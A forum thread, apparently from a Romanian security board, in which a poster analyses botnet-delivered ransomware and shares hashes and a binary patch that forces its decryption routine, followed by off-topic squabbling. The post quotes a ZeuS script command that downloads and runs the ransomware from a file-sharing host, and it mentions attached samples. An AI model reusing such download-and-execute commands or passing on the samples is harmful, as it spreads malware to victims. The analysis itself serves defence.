Jump to content

Recommended Posts


Generic ransomware pushed to small ZeuS botnet machines by script:

user_execute hxxp://ge.tt/api/1/files/4k8mPe82/0/blob?download >> (informations.exe)


zeus script.png (835.88 KiB) Viewed 115 times

ec2b6ecfc8ca67f9357b6550166a0838 informations.exe (UPX)

6ec6069728a91a04407283bc6bf208b7 UNPACKED

Some generic ransomware junk..run in VM it asks for a password to decrypt files so I thought I would try to crack.


winxp.png (590.39 KiB) Viewed 115 times

I'm not a great RE like most ppl on here so I gave up and just patched the binary :D

Change 00401C19 > JMP 0040124F (decryption routine)

Attached are samples and patched binary in case anyone needs to unlock stuff... I was surprised, the malware does decrypt everything.. I did not look into the encryption routine or the password too much, but I'm sure someone around here can figure it out.



Posted (edited)

Dovada ca el posteaza fara sa verifice, copy/paste dupa alt forum cred :))


Te rog nu mai veni aici cu scuze de 2 lei, cine are 20 de conturi banate?

apropo m-ai dat pe spate cu asta

Voi sunteti aici doar pentru offtopic ( fiindca sa vede ca doar asta va duce capul)

Sa punem si noi o piesa nu?

Edited by NETGEAR
Posted (edited)

Fetele, de ce comentati aiurea? postul era de xylitol ( un om foarte cunoscut in Franta si influent) ma cunosc cu el de ceva timp.

app am pus sursa ca de pe acel forum l-am luat dar ulterior au mutat postul. ( Sunt membru pe KM din 2010 )

Download-ul inca merge asa ca GURA!

Va place sa comentati aiurea dar inainte incercati sa descarcati geniilor. @NETGEAR in loc sa comentati da-ti log out.

Nu mai comentati aiurea, nu mai incercati sa va bagati in seama cu mine ca nu dau tuturor.... importanta!

Voi sunteti aici doar pentru offtopic ( fiindca sa vede ca doar asta va duce capul)

Ba mai mult unu dintre voi (se stie el) are deja 20 de conturi banate si asta spune totul.


Melodie cu dedicatie speciala pentru:

Doru alu' Supozitor si Vasile n'Curamluat-o

@NETGEAR Primele mele posturi sunt in 2011 ( 21-11-2011 )

Oricum iti urez noroc cu cariera ta de hater( copil cu 8 clase )

Edited by Aerosol
Posted (edited)

Boule, ai inceput sa postezi dupa Aerosol acum cateva luni, cand mi-am facut eu contu asta mai exact

doar ca eu am 92 post-uri(cu asta) si tu 2,228?:))

Ce parere ai? eu nu puteam sa mut HF sau altele aici prin copy/paste?

On: Mai pune odata sursa ca aia nu merge, vezi ca trebuie sa stii unde s-a mutat daca ai cont acolo din 2010 :*

Serios? @Aerosol ?


Edited by NETGEAR

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Create New...